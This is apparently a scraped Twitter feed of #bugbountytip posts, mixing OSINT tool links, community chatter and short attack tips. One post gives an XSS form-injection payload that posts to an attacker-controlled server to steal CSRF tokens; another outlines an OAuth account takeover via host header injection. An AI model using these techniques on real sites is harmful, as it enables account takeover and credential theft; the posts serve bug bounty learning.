-
Some
#bugbounty hunters made over €50.000 in bug bounties with this simple trick.
Thanks for the #BugBountyTip,@rez0__!pic.twitter.com/z9sPFJTNqV
Prikaži ovu nit -
Steps 0) Login in with Twitter 1) Host Header Injection [to a.cxx] 2) Generate OAuth Token's Link 3) Send link to Victim, after victim authorize 4) Verifier send to a.cxx 5) Reuse use token Account Takeover by
@ngalongc#bugbountytips#bugbountytip https://hackerone.com/reports/317476 -
If you have a XSS in a <form> tag, close it and open a new form that you are controlling. Payload : "></form><form action="http://yourserver/> This is just a short payload for increasing the severity.
#bugbountytip#bugbountytipshttps://sametsahin.net/posts/steal-csrf-tokens-with-simple-xss/ …Prikaži ovu nit -
#OSINT : Better Whois:http://www.betterwhois.com Active Whois:http://www.johnru.com ZabaSearch:http://www.zabasearch.com TinEye:http://www.tineye.com isearch:http://www.isearch.com/ serversniff:http://serversniff.net/ robtex:http://www.robtex.com#BugBountyTip#Hacking#pentest -
#OSINT DomainTools:http://www.domaintools.com Active Whois:http://www.johnru.com Domain Dossier:http://centralops.net Network Solutions:http://www.networksolutions.com DNSstuff:http://www.dnsstuff.com DNS-Digger:http://dnsdigger.com Shodan:http://www.shodan.io#bugbountytip -
WooT! There is always a way. New
#bugbounty#pentest short write up! Chain the bugs till you get what you want.#bugbountytip#bugbountytips#hacking Some steps were not mentionned. RT, Like and Comments are appreciated. For any pentest work DM me:)
pic.twitter.com/nlAv4pMPhx
Prikaži ovu nit -
Look what I found on
@LinkedIn
Have fun my friends, BUG OUT.
#CyberSecurity#Security#BugBountyTip#bugbountytips#Hackers#SecurityResearcher#TheCyberSecurityHubpic.twitter.com/8oCpnkRIly
-
My first bounty, after 25+ dups and 2 N/As. Got Hall of Fame in few programs but never get paid. Thanks to all members of bug bounty community.
@Hacker0x01 A special Thanks to@OffensiveHunter Sir &@abhinavbom Sir for the guidance.#bugbounty#bugbountytip#TogetherWeHitHarderpic.twitter.com/kKQQZ84Bba
-
#bugbountytip#bugbountytips Never underestimate the power of Google Dorking. Just found a defaced website for bugbounty program.pic.twitter.com/M3kEwoNDtI
-
hey anyone here targeted AT&T, if AT&T make my report triaged that's mean my report accepted 100% or not ?
#BugBounty#bugbountytips#bugbountytip -
Next time add
#BugBountyTip to your post to get maximum profit -
BLH - Broken Link Hijacking Just suppose Ur site uses cool.c/Script.js After few year cool.c decided to close it services. Now story begins
buys cool.c and then host Script.js
BOoOM
This happened to Linkedin
READ BELOW
#bugbountytips#bugbountytip#bugbountyhttps://twitter.com/fatratfatrat/status/1222950920079626240 … -
Thanks for the awesome shoutout in your video
@InsiderPhD!#bugbountytips#bugbountytip -
Reflected XSS https://link.medium.com/j1cgHbZpq3 https://link.medium.com/q9eeokp2J3 https://link.medium.com/5zdO3gPEw3 https://link.medium.com/vwwEcNQEw3 https://link.medium.com/TH0sHaq2J3 https://link.medium.com/njXx6sq2J3 https://victoni.github.io/bug-hunting-xss-on-cookie-popup-warning … https://gauravnarwani.com/cookie-worth-a-fortune … https://link.medium.com/bx6lLPq2J3 https://link.medium.com/3khM76q2J3
#bugbounty#bugbountytip -
Any good external bug bounty program?
#bugbounty#bugbountytips#bugbountytip -
Do you know any labs (free or paid ) to practice new CVEs online? Except
@PentesterLab and pentesteracademy#bugbountytips#bugbounty#bugbountytipPrikaži ovu nit -
Install Python. Open yourself up to a word of open-source bug bounty tools. Don't put it off, because it will enrich your skills.
#BugBounty#bugbountytips#BugBountyTip#infosec#infosecurity -
Button disabled? Inspect Element -> change from "disabled" to "enabeld" -> Button enabeld and action performed
#BugBountyTip

-
An Interesting Account Takeover:
#infosec#bugbountytips#BugBountyTip#hackerone#bugcrowd Credits:@fatratfatrat

pic.twitter.com/fPCoT5hV5W
-
Thanks
@traceableai for providing API testing resources(tips) There aren't many info about API testing but your tups and this blog post is awesome to learn API Testing#bugbountytips#bugbountytip#bugbountyhttps://twitter.com/traceableai/status/1221704507953840128 …
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.